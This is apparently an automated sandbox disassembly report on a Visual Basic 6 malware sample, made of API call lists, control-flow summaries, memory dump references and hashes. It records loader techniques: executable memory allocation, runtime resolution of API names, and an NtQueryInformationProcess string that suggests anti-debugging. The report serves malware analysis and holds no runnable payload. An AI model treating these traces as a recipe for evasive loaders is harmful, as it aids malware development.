                                                                    • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9C5
                                                                      • Part of subcall function 0054BC0E: #697.MSVBVM60(?,00000000,?,00000000,?,00000002,?), ref: 0054BCB3
                                                                      • Part of subcall function 0054BC0E: __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCCE
                                                                      • Part of subcall function 0054BC0E: __vbaVarMove.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCD8
                                                                      • Part of subcall function 0054BC0E: __vbaFreeVar.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054BCE0
                                                                      • Part of subcall function 0054BC0E: __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0054BD01
                                                                      • Part of subcall function 0054BC0E: __vbaVarMove.MSVBVM60(?,00000002,?), ref: 0054BD0B
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9E0
                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9EA
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9F2
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000,?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004), ref: 0054BA17
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,00000024,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054BA7B
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0054BA8C
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054BA94
                                                                    • #644.MSVBVM60(?,?), ref: 0054BAA1
                                                                    • #644.MSVBVM60(?,?,?,?), ref: 0054BACB
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000008,00000040,?,?,?,?), ref: 0054BAEB
                                                                    • __vbaFreeStr.MSVBVM60(0054BB19,?,?,00000008,00000040,?,?,?,?), ref: 0054BB03
                                                                    • __vbaFreeObj.MSVBVM60(0054BB19,?,?,00000008,00000040,?,?,?,?), ref: 0054BB0B
                                                                    • __vbaFreeStr.MSVBVM60(0054BB19,?,?,00000008,00000040,?,?,?,?), ref: 0054BB13
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$#644$Move$Chkstk$Addref$#697CastCheckHresultListLockNew2RedimUnlock
                                                                    • String ID: (W

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D429
                                                                    • __vbaVarAdd.MSVBVM60(?,00000002,?,?,00006011,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D49D
                                                                    • __vbaVarSub.MSVBVM60(?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?,00401006), ref: 0054D4AE
                                                                    • __vbaI4Var.MSVBVM60(00000000,?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?,00401006), ref: 0054D4B4
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?), ref: 0054D4C6
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D4D7
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D4ED
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D4FC
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,00401006,?,?,?,0054CCD4,?,?), ref: 0054D505
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,00000000,?,?,?,?,?), ref: 0054D52C
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054D53D
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?), ref: 0054D549
                                                                    • __vbaSetSystemError.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?), ref: 0054D588
                                                                    • __vbaAryUnlock.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?), ref: 0054D591
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,?), ref: 0054D59A
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054D5B5
                                                                    • __vbaVarTstEq.MSVBVM60(00008003,?), ref: 0054D5D8
                                                                      • Part of subcall function 0054D38A: __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054D466,?,00006011,?,?,?,?,00401006), ref: 0054D3A5
                                                                      • Part of subcall function 0054D38A: __vbaRefVarAry.MSVBVM60(?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011,?,?,?,?), ref: 0054D3BA
                                                                      • Part of subcall function 0054D38A: __vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011), ref: 0054D3C3
                                                                      • Part of subcall function 0054D38A: __vbaVarMove.MSVBVM60(00000001,00000000,?,?,?,?,?,00401006,?,?,?,0054D466,?,00006011), ref: 0054D3D8
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00008003,?), ref: 0054D5FD
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0054D60E
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0054D624
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 0054D633
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D63F
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D655
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D664
                                                                    • __vbaFreeVar.MSVBVM60(0054D6C6,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D6B5
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054D6C6,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054D6C0
                                                                    Similarity
                                                                    • API ID: __vba$LockUnlock$#644$ChkstkFreeMoveRedim$DestructErrorListSystemUbound

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C245
                                                                      • Part of subcall function 0054C16A: __vbaChkstk.MSVBVM60(?,0054BB64,0054B8E6,?,00000008,?,00000000,00401006,?,?,?,0054B849,00000000,-00000004,00000000,00000000), ref: 0054C170
                                                                    • #644.MSVBVM60(?,00574C83,?,?,?,?,00401006), ref: 0054C26E
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,00000004,?,00574C83,?,?,?,?,00401006), ref: 0054C294
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,?,00003000,00000040,?,00000000,00000004,?,00574C83), ref: 0054C2B2
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,00574C83,?,?,?,?,00401006), ref: 0054C2C1
                                                                    • #644.MSVBVM60(?,?,?,?,00574C83,?,?,?,?,00401006), ref: 0054C2D7
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00574C83,?,?,?,?,00401006), ref: 0054C2E3
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,-00000004,?,?,?,?,?,?,00574C83,?,?,?,?,00401006), ref: 0054C306
                                                                    • #644.MSVBVM60(?,?,?,?,-00000004,?,?,?,?,?,?,00574C83), ref: 0054C31C
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,-00000004,?,?,?,?,?,?,00574C83), ref: 0054C328
                                                                      • Part of subcall function 0054C182: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C19E
                                                                      • Part of subcall function 0054C182: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006), ref: 0054C1B6
                                                                      • Part of subcall function 0054C182: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401006), ref: 0054C1C0
                                                                      • Part of subcall function 0054C182: #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401006), ref: 0054C1C6
                                                                      • Part of subcall function 0054C182: __vbaVarMove.MSVBVM60 ref: 0054C1DB
                                                                      • Part of subcall function 0054C182: __vbaFreeStr.MSVBVM60 ref: 0054C1E3
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,00401006,?,?,?,?,?,?,?,?,-00000004,?,?,?), ref: 0054C350
                                                                    • #644.MSVBVM60(?,?,?,?,00401006,?,?,?,?,?,?,?,?,-00000004,?,?), ref: 0054C366
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00401006,?,?,?,?,?,?,?,?,-00000004,?), ref: 0054C372
                                                                    • __vbaI4Var.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401006,?,?,?,?,?,?), ref: 0054C38E
                                                                    • __vbaVarMove.MSVBVM60(?,00000000,?,?,00000000,?,?,?,?,?,?,00401006,?,?,?), ref: 0054C3AC
                                                                    • __vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,?,?,?,?,?,?,00401006,?,?,?), ref: 0054C3B4
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054C3F0,?,00000000,?,?,00000000,?,?,?,?,?,?,00401006,?), ref: 0054C3EA
                                                                    Similarity
                                                                    • API ID: __vba$#644$ChkstkLockUnlock$FreeMove$AllocDestructNofreeRedimVargVirtual

                                                                    Control-flow Graph

                                                                    control_flow_graph 838 57c48c-57c4ca __vbaChkstk call 549601 * 2 843 57c4e4 838->843 844 57c4cc-57c4e2 __vbaNew2 838->844 845 57c4eb-57c548 __vbaChkstk * 2 843->845 844->845 847 57c564 845->847 848 57c54a-57c562 __vbaHresultCheckObj 845->848 849 57c568-57c56f 847->849 848->849 850 57c571-57c587 __vbaNew2 849->850 851 57c589 849->851 852 57c590-57c59f 850->852 851->852 853 57c5a1-57c5b7 __vbaNew2 852->853 854 57c5b9 852->854 855 57c5c0-57c5e3 __vbaObjSetAddref 853->855 854->855 857 57c5e5-57c5fa __vbaHresultCheckObj 855->857 858 57c5fc 855->858 859 57c600-57c608 __vbaFreeObj call 57c62d 857->859 858->859 861 57c60d-57c61d 859->861
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054F443,?,?,?,?,00401006), ref: 0057C4A7
                                                                    • __vbaNew2.MSVBVM60(00407E7C,0057F300,?,?,?,00000000,00401006,?,?,?,0054F443), ref: 0057C4D6
                                                                    • __vbaChkstk.MSVBVM60 ref: 0057C512
                                                                    • __vbaChkstk.MSVBVM60 ref: 0057C523
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A4,000002B0), ref: 0057C55A
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 0057C57B
                                                                    • __vbaNew2.MSVBVM60(00407E7C,0057F300), ref: 0057C5AB
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0057C5C9
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0057C5F2
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0057C603
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkNew2$CheckHresult$AddrefFree

                                                                    Control-flow Graph

                                                                    control_flow_graph 903 57c415-57c453 __vbaChkstk call 40a920 905 57c458-57c46d __vbaSetSystemError 903->905
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054AE1C,?,?,?,?,?,?,00401006), ref: 0057C430
                                                                    • __vbaSetSystemError.MSVBVM60(000000FF,00000022,00000030,00000004,?,?,?,?,00401006), ref: 0057C458
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkErrorSystem
                                                                    • String ID: 0
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ADBB
                                                                      • Part of subcall function 0057C3B4: __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054AE06,?,?,?,?,?,00401006), ref: 0057C3CF
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00401006), ref: 0054AE09
                                                                      • Part of subcall function 0054AF1D: __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054AE13,?,?,?,?,?,00401006), ref: 0054AF3A
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF56
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF60
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF6B
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF75
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF80
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF8A
                                                                      • Part of subcall function 0054AF1D: #644.MSVBVM60(00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13), ref: 0054AF90
                                                                      • Part of subcall function 0054AF1D: GetModuleHandleW.KERNEL32(00000000,00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006), ref: 0054AF96
                                                                      • Part of subcall function 0054AF1D: __vbaFreeStrList.MSVBVM60(00000003,?,00401006,00000000,00000000,00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000), ref: 0054AFAE
                                                                      • Part of subcall function 0054AF1D: __vbaChkstk.MSVBVM60 ref: 0054AFCD
                                                                      • Part of subcall function 0054AF1D: __vbaStrVarVal.MSVBVM60(?,?,?), ref: 0054AFEF
                                                                      • Part of subcall function 0054AF1D: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 0054AFF9
                                                                      • Part of subcall function 0054AF1D: GetProcAddress.KERNEL32(00000000,?), ref: 0054B005
                                                                      • Part of subcall function 0054AF1D: __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 0054B019
                                                                      • Part of subcall function 0054AF1D: __vbaFreeVar.MSVBVM60 ref: 0054B024
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A208,0040A1FC), ref: 0054B033
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(0040A208,0040A1FC), ref: 0054B03D
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A218,00000000,0040A208,0040A1FC), ref: 0054B048
                                                                      • Part of subcall function 0054AF1D: __vbaStrMove.MSVBVM60(0040A218,00000000,0040A208,0040A1FC), ref: 0054B052
                                                                      • Part of subcall function 0054AF1D: __vbaStrCat.MSVBVM60(0040A22C,00000000,0040A218,00000000,0040A208,0040A1FC), ref: 0054B05D
                                                                      • Part of subcall function 0057C415: __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054AE1C,?,?,?,?,?,?,00401006), ref: 0057C430
                                                                      • Part of subcall function 0057C415: __vbaSetSystemError.MSVBVM60(000000FF,00000022,00000030,00000004,?,?,?,?,00401006), ref: 0057C458
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401006), ref: 0054AE1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ChkstkFreeMove$List$#644AddressAnsiErrorHandleModuleProcSystem
                                                                    • String ID:
                                                                    • API String ID: 1084042792-0
                                                                    • Opcode ID: 09cc610a7555717751e5acb10b70b89146f4dccad5b3eb86fb52656cdc542a79
                                                                    • Instruction ID: 815d1665ba970f0d95d1afb21f17fedd6c7ccd0d38fb285ecba0fd914f6b1051
                                                                    • Opcode Fuzzy Hash: 09cc610a7555717751e5acb10b70b89146f4dccad5b3eb86fb52656cdc542a79
                                                                    • Instruction Fuzzy Hash: 2A014C71800208ABCB00EFA4C98BBCDBFB8FF48748F508469F404AB152C739AA148F95
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054F410
                                                                      • Part of subcall function 0057C48C: __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054F443,?,?,?,?,00401006), ref: 0057C4A7
                                                                      • Part of subcall function 0057C48C: __vbaNew2.MSVBVM60(00407E7C,0057F300,?,?,?,00000000,00401006,?,?,?,0054F443), ref: 0057C4D6
                                                                      • Part of subcall function 0057C48C: __vbaChkstk.MSVBVM60 ref: 0057C512
                                                                      • Part of subcall function 0057C48C: __vbaChkstk.MSVBVM60 ref: 0057C523
                                                                      • Part of subcall function 0057C48C: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A4,000002B0), ref: 0057C55A
                                                                      • Part of subcall function 0057C48C: __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 0057C57B
                                                                      • Part of subcall function 0057C48C: __vbaNew2.MSVBVM60(00407E7C,0057F300), ref: 0057C5AB
                                                                      • Part of subcall function 0057C48C: __vbaObjSetAddref.MSVBVM60(?,?), ref: 0057C5C9
                                                                    Similarity
                                                                    • API ID: __vba$Chkstk$New2$AddrefCheckHresult
                                                                    • String ID:
                                                                    • API String ID: 1889392896-0
                                                                    • Opcode ID: 0a8f0a6e4697301072b03498af77774bbd72f2b8c467dc61e3250ae4979938e8
                                                                    • Instruction ID: 3178a8562f5cd90d1ff6d505fe2dafbddede7e7d9f637ebc3c7ac210ab2edec4
                                                                    • Opcode Fuzzy Hash: 0a8f0a6e4697301072b03498af77774bbd72f2b8c467dc61e3250ae4979938e8
                                                                    • Instruction Fuzzy Hash: 5E01E875A00648EFCB11DF58D946B8DBFF4FB44794F108465F809DB660C335AA40DB94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054AE06,?,?,?,?,?,00401006), ref: 0057C3CF
                                                                      • Part of subcall function 0054A57F: NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,005492E3,?,NtQueryInformationProcess,005492FD,?,NtQueryInformationProcess,005492CC,NtQueryInformationProcess), ref: 0054A616
                                                                    Similarity
                                                                    • API ID: AllocateChkstkMemoryVirtual__vba
                                                                    • String ID:
                                                                    • API String ID: 3513745053-0
                                                                    • Opcode ID: 98c255a1420ec23d717739530212359ca2362c26a9bfa024e3cdd47f691dd7d4
                                                                    • Instruction ID: 6b1dfaa902795fe47e0719df23f8dff7256f70da6c1c19698192f0758a35f7bd
                                                                    • Opcode Fuzzy Hash: 98c255a1420ec23d717739530212359ca2362c26a9bfa024e3cdd47f691dd7d4
                                                                    • Instruction Fuzzy Hash: 52D0C2B0440344BAC6119B858D0BF5ABEACF705F48F108C5EF00473580D3B868409166
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 0-2781105232
                                                                    • Opcode ID: ef2d08c63cdb670e00455a678b60a976ede209c45352bada566071cf405533ee
                                                                    • Instruction ID: 39437d41843279c9b1d8fe9b2221ea3c523c588a971dd3255f2e60df14f1badb
                                                                    • Opcode Fuzzy Hash: ef2d08c63cdb670e00455a678b60a976ede209c45352bada566071cf405533ee
                                                                    • Instruction Fuzzy Hash: 66F030307D4101EEDAF1AA24CC4AFAA2FA5FB54B5CF209871F406EA1D2E664DC42D613
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    • Opcode Fuzzy Hash: 1b19f92bb6a62260cb77fb0fb83bfe345c3be7d5a70bace5a69a672ceb2f3423
                                                                    • Instruction Fuzzy Hash: 8CB00135266981CFD296CB0AC194F5073B8FB04A41F4655F1E4059BA62C738A900CA00
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054DD8D
                                                                    • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,0000000B,00000000,?,?,?,?,00401006), ref: 0054DDB5
                                                                    • __vbaVarCopy.MSVBVM60 ref: 0054DDF0
                                                                    • __vbaStrCat.MSVBVM60(0040AA48,0040AB88), ref: 0054DDFF
                                                                    • __vbaStrMove.MSVBVM60(0040AA48,0040AB88), ref: 0054DE09
                                                                    • __vbaStrCat.MSVBVM60(0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE14
                                                                    • __vbaStrMove.MSVBVM60(0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE1E
                                                                    • __vbaStrCat.MSVBVM60(0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE29
                                                                    • __vbaStrMove.MSVBVM60(0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE33
                                                                    • __vbaStrCat.MSVBVM60(0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE3E
                                                                    • __vbaStrMove.MSVBVM60(0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE48
                                                                    • __vbaStrCat.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE53
                                                                    • __vbaVarZero.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE88
                                                                    • __vbaStrCat.MSVBVM60(0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE97
                                                                    • __vbaStrMove.MSVBVM60(0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DEA1
                                                                    • __vbaStrCat.MSVBVM60(0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DEAC
                                                                    • __vbaStrMove.MSVBVM60(0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DEB6
                                                                    • __vbaStrCat.MSVBVM60(0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DEC1
                                                                    • __vbaStrMove.MSVBVM60(0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DECB
                                                                    • __vbaStrCat.MSVBVM60(0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000), ref: 0054DED6
                                                                    • __vbaStrMove.MSVBVM60(0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000), ref: 0054DEE0
                                                                    • __vbaStrCat.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000), ref: 0054DEEB
                                                                    • __vbaVarZero.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000), ref: 0054DF20
                                                                    • #698.MSVBVM60(?,00000049,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000), ref: 0054DF2B
                                                                    • #698.MSVBVM60(?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000), ref: 0054DF36
                                                                    • #698.MSVBVM60(?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88), ref: 0054DF44
                                                                    • __vbaVarCat.MSVBVM60(?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4), ref: 0054DF55
                                                                    • __vbaVarCat.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054DF69
                                                                    • __vbaVarZero.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054DF8A
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054DFC3
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054DFFC
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054E035
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054E06E
                                                                    • __vbaStrCat.MSVBVM60(0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000), ref: 0054E07D
                                                                    • __vbaStrMove.MSVBVM60(0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000), ref: 0054E087
                                                                    • __vbaStrCat.MSVBVM60(0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049), ref: 0054E092
                                                                    • __vbaStrMove.MSVBVM60(0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049), ref: 0054E09C
                                                                    • __vbaStrCat.MSVBVM60(0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044), ref: 0054E0A7
                                                                    • __vbaStrMove.MSVBVM60(0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044), ref: 0054E0B1
